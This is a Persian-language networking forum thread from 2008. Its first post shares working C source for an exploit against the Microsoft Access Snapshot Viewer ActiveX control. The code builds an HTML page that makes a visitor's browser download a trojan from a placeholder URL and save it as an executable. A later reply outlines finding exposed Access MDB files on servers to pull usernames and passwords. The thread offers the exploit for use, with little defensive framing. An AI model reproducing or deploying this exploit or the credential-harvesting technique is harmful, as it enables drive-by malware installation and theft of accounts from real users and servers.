Persian Networks
تبلیغات در Persian Networks

به انجمن Perisan Networks خوش آمدید.
این انجمن محیطی برای بحث و تبادل نظر در مورد مسائل مختلف موجود در شبکه های کامپیوتری است. در این انجمن می توانید پرسشهای خود را مطرح نمایید و در مورد آنها با دیگران به تبادل نظر بپردازید، از تجربیات دیگران استفاده کنید و تجربیات و دانش خود را با دیگران به اشتراک بگذارید.
مشاهده مطالب نوشته شده و خواندن نوشته های دیگران آزاد است، ولی برای دسترسی به تمامی قابلیتهای انجمن (نظیر نوشتن مطلب و دریافت فایل ها و ...) حتما باید ثبت نام کنید. پیش از ثبت نام قوانین انجمن به شما نمایش داده می شود، خواهشمندیم حتما با دقت قوانین را مطالعه فرمایید.

برای ثبت نام در انجمن از این صفحه استفاده کنید.

اگر در حین ثبت نام و یا ورود به انجمن با مشکلی مواجه شدید، از طریق این صفحه و با پر کردن فرم مربوطه به مدیر انجمن اطلاع دهید تا مشکلتان بررسی و برطرف گردد.

Go Back   Persian Networks > پرسش و پاسخ > امنیت اطلاعات و سیستم های اطلاعاتی-ا-
ثبت نام قوانین انجمن جستجو نوشته های امروز علامت گذاری انجمن ها به عنوان خوانده شده


ارسال پاسخ
 
LinkBack امکانات بيشتر جستجو در اين بحث رتبه بدهيد نحوه نمايش
Old 2008-07-28, 07:23 PM   #1 (permalink)
(Alireza HBB)
Registered User
 
Alux's Avatar
 
Join Date: Jan 2006
Location: Tehran
نوشته ها: 1,526
Thanks: 343
Thanked 232 Times in 143 Posts
Groans: 37
Groaned at 17 Times in 11 Posts
باگ خطرناک در ACCESS

یه باگ خطرناک امروز دیدم واسه اکسل اومده

که با کابر اجازه می ده یه تروجان در سرور آپلود کنه

باگ بصورت ریموت هست

اینم کد



Code:
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit Ms-Access SnapShot Exploit Snapview.ocx v 10.0.5529.0 Download nice binaries into an arbitrary box Vulnerability discovered by Oliver Lavery http://www.securityfocus.com/bid/8536/info Remote: Yes greetz to str0ke */ #include <stdio.h> #include <stdlib.h> #define Filename "Ms-Access-SnapShot.html" FILE *File; char data[] = "<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attack'></object>\n" "<script language='javascript'>\nvar arbitrary_file = 'http://path_to_trojan'\n" "var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n" "attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n" "<script>\n<html>"; int main () { printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n"); printf("**c0ded by callAX**\n"); printf("**r00t your enemy .| **"); char *b0fer; if ( (File = fopen(Filename,"w")) == NULL ) { printf("\n fopen() error"); exit(1); } b0fer = (char*)malloc(strlen(data)); fwrite(data, strlen(data), 1,File); fclose(File); printf("\n\n" Filename " has been created.\n"); return 0; }
__________________
Alux @ Dci . IR
A.Habibi@Datak-Telecom.net
Alux is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
پاسخ به همراه نقل قول
1 سپاس و تایید
ccna (2008-07-29)
تبلیغات

تبلیغات در Persian Networks
Old 2008-07-29, 07:59 PM   #2 (permalink)
(شاهین غرقی)
Registered User
 
webgard3's Avatar
 
Join Date: Feb 2006
Location: iran/shiraz
نوشته ها: 3,442
Thanks: 135
Thanked 671 Times in 415 Posts
Groans: 6
Groaned at 13 Times in 12 Posts
یعنی آپلود کنه روی سروری که روش اکسل نصبه؟
__________________
Shahin Gharghi
www.PersianAdmins.com
Shahin@Admins.ir
webgard3 is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
پاسخ به همراه نقل قول
Old 2008-07-29, 08:28 PM   #3 (permalink)
(Alireza HBB)
Registered User
 
Alux's Avatar
 
Join Date: Jan 2006
Location: Tehran
نوشته ها: 1,526
Thanks: 343
Thanked 232 Times in 143 Posts
Groans: 37
Groaned at 17 Times in 11 Posts
آره ، خوراک NTTAC
__________________
Alux @ Dci . IR
A.Habibi@Datak-Telecom.net
Alux is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
پاسخ به همراه نقل قول
Old 2008-07-29, 11:07 PM   #4 (permalink)
(مهدي)
Registered User
 
herus_deus's Avatar
 
Join Date: May 2004
نوشته ها: 904
Thanks: 107
Thanked 133 Times in 84 Posts
Groans: 3
Groaned at 0 Times in 0 Posts
البته اكسس منظوره نظر بوده.
__________________
مردم زيادند و پر توقع و خدا يكي است و سريع الرضا،پس تو او را راضي كن،ديگران چيزي نيستند.
herus_deus is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
پاسخ به همراه نقل قول
Old 2008-07-30, 07:07 PM   #5 (permalink)
(Alireza HBB)
Registered User
 
Alux's Avatar
 
Join Date: Jan 2006
Location: Tehran
نوشته ها: 1,526
Thanks: 343
Thanked 232 Times in 143 Posts
Groans: 37
Groaned at 17 Times in 11 Posts
اشتباه لپی بود !!!
__________________
Alux @ Dci . IR
A.Habibi@Datak-Telecom.net
Alux is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
پاسخ به همراه نقل قول
Old 2008-07-31, 03:56 PM   #6 (permalink)
(ali)
Registered User
 
Join Date: Nov 2007
نوشته ها: 92
Thanks: 20
Thanked 9 Times in 8 Posts
Groans: 4
Groaned at 1 Time in 1 Post
access باگ زیاد داده ... الان شما اگه یک سروری که دیتابسش از اکسس باشه کار براش از اکسس استفاده کنن ( که نیست دیگه خیلی قدیمیه ) شما با یه برنامه ای مثل Intellitamper می تونین فایل MDB رو پیدا کنین و دل کنین که یوزر پس توش هستش .. مثلا پورتال های News دوسال پیش یادامه خیلی اینجوری هک می شدن ..... اینم باگ جالبی بود ممنونم از دوسته خوبمون آقا علی رضا بابت اطلاع رسانیه عالی
shast is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
پاسخ به همراه نقل قول
ارسال پاسخ


امکانات بيشتر جستجو در اين بحث
جستجو در اين بحث:

جستجوی پیشرفته
نحوه نمايش Rate This Thread
Rate This Thread:

قواعد نوشتن
ارسال مطالب جدید: not مجاز
ارسال پاسخ: not مجاز
ارسال ضمیمه: not مجاز
ویرایش نوشته های خود: not مجاز

کدهای vB: مجاز
شکلک ها: مجاز
کدهای [IMG]: مجاز
کدهای HTML: غیر مجاز
Trackbacks are مجاز
Pingbacks are مجاز
Refbacks are مجاز


مطالب مشابه
مطلب آغازگر انجمن پاسخ آخرین نوشته
Securing the ISA Server Configuration ben611b Microsoft ISA Server -ا- 9 2008-05-07 01:40 PM
معرفی پروتکل RADIUS top7news مباحث عمومی شبکه -ا- 5 2007-11-24 11:53 AM
تنظيمات access list ها و امنيت در شبکه ccna Cisco Systems -ا- 2 2007-09-04 07:44 PM




تمام زمان ها برپایه ساعت جهانی (GMT - گرینویچ) +3.5 می‌باشد.
اکنون ساعت 05:13 PM است.


Powered by vBulletin® Version 3.6.9
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
[page compression: 54.17 k/63.05 k (14.07%)]